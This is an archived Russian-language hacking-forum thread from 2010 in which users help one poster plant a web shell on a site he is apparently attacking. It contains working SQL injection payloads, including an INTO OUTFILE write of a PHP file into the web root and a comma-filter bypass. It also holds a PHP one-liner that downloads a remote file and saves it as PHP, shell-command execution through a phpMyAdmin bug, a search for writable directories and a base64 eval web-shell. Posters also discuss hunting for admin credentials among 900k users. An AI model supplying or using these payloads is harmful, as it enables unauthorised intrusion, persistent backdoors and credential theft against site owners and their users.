ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.05.2010, 10:51
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 14
Провел на форуме:
92208
Репутация:
6
|
|
Проблема с заливкой, сколько пытаюсь нечего не помогает, в интернете статей по поводу этого нету, везде одно и тоже.. или outfile или dumpfile а если фильтруются ковычки что делать не кто не говорит =(
Читать файлы могу с помощью LOAD_FILE но
-587955+union+select+1,2,3,4,0x6869,6,7,8,9,10,11+i nto+outfile+'/home/data/www/2323.php'+from+mysql.user--
не пашет, так как фильтрует кавычки, дамп файл тоже не пашет, кодировки в чар, хекс и тд и тп тоже не помагают, второй подзапрос с обходом магик_куотс не прокатывает =( что еще можно применить ? (мозг и руки уже имеются)
|
|
|
22.05.2010, 10:59
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от CTAPu4OK
Проблема с заливкой, сколько пытаюсь нечего не помогает, в интернете статей по поводу этого нету, везде одно и тоже.. или outfile или dumpfile а если фильтруются ковычки что делать не кто не говорит =(
Читать файлы могу с помощью LOAD_FILE но
-587955+union+select+1,2,3,4,0x6869,6,7,8,9,10,11+i nto+outfile+'/home/data/www/2323.php'+from+mysql.user--
не пашет, так как фильтрует кавычки, дамп файл тоже не пашет, кодировки в чар, хекс и тд и тп тоже не помагают, второй подзапрос с обходом магик_куотс не прокатывает =( что еще можно применить ? (мозг и руки уже имеются)
file_priv что говорит?
|
|
|
|
22.05.2010, 11:14
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 14
Провел на форуме:
92208
Репутация:
6
|
|
Сообщение от Konqi
file_priv что говорит?
, FILE_PRIV есть.
Ошибки сервера выложить не могу, так как их нету (в смысле на экране))
|
|
|
|
22.05.2010, 11:17
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
обычным смертным это не дано=((( в привате наверно есть какие-нибудь методы....
|
|
|
|
22.05.2010, 11:32
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 14
Провел на форуме:
92208
Репутация:
6
|
|
Сообщение от pinch
обычным смертным это не дано=((( в привате наверно есть какие-нибудь методы....
Надеюсь найдутся добрые люди которые хотя бы шипнут про способ)
пы.сы. И если есть пхп программеры, может у кого найдется скрипт который при выполнении скачает txt файл с внешки и переименует его в php (Это не для скули)
|
|
|
|
22.05.2010, 11:36
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
PHP код:
copy('http://2.ru/1.txt', '1.php');
|
|
|
|
22.05.2010, 11:46
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Сообщение от CTAPu4OK
Проблема с заливкой, сколько пытаюсь нечего не помогает, в интернете статей по поводу этого нету, везде одно и тоже.. или outfile или dumpfile а если фильтруются ковычки что делать не кто не говорит =(
Читать файлы могу с помощью LOAD_FILE но
-587955+union+select+1,2,3,4,0x6869,6,7,8,9,10,11+i nto+outfile+'/home/data/www/2323.php'+from+mysql.user--
не пашет, так как фильтрует кавычки, дамп файл тоже не пашет, кодировки в чар, хекс и тд и тп тоже не помагают, второй подзапрос с обходом магик_куотс не прокатывает =( что еще можно применить ? (мозг и руки уже имеются)
А ты на 100% уверен что у тебя путь до дериктории правельный??
Если нет ошибок на страничке, тогда как ты узнал путь?
и ести у тебя есть доступ к mysql, то ищи phpmyadmin, или пробуй на удаленный доступ!
|
|
|
|
22.05.2010, 12:03
|
|
Новичок
Регистрация: 28.10.2008
Сообщений: 14
Провел на форуме:
92208
Репутация:
6
|
|
Сообщение от GOGA075
А ты на 100% уверен что у тебя путь до дериктории правельный??
Если нет ошибок на страничке, тогда как ты узнал путь?
и ести у тебя есть доступ к mysql, то ищи phpmyadmin, или пробуй на удаленный доступ!
На 100% уверен что путь правельный, доступ к серверу так же имею с помощью бага phpmyadmin
PHP код:
$output = `ls -la /home/data/www`;
print "<pre>$output</pre>";
exit;
Но увы я под юзверем apache и создавать, именять, архивировать, редактировать, удалять и тд и тп не имею права, вообщем ограничен до хрен знает чего.
Щя еще попробую скачать с внешки с помощью скрипта.
Полного доступа к mysql у меня нету, только скуля, логин и пароль админа среди 900к+ юзверев искать (если учесть что там все ид номера в разброс и все не попорядку, так еще и через лимит, так как group_concat выводит не все) просто бред, а автоматизированного способа я не знаю =(
+ ко всему этому все конфигурационные файлы 667, т.е. читать с помощью скули или команды cat я не могу.
Я очень давно всем этим не занимался, вот пришлось вспомнить
|
|
|
|
22.05.2010, 12:23
|
|
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863
Репутация:
80
|
|
Ребята, помогите, очень нужна помощь.
Как в SQL-injection можно заменить запятую (именно запятую, не кавычку)? Вижу вариант только с char(44), но не знаю как правильно запрос составить. Вот пример:
index.php?id=-999+union+select+1+char(44)+2+char(44)+3+--+
или как-то через скобки?
Уже столько вариантов перепробовал, и не знаю что делать.
|
|
|
|
22.05.2010, 12:24
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме:
264305
Репутация:
30
|
|
CTAPu4OK
поиск доступных файлов/папок для записи:
find /home/data/www -perm -2 -ls
доступ к /tmp/bla.php есть практически всегда
если у тебя есть возможность выполнять php код на сервере то с кавычками можно бороться так:
<?eval(base64_decode($_GET[shell]));?>
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
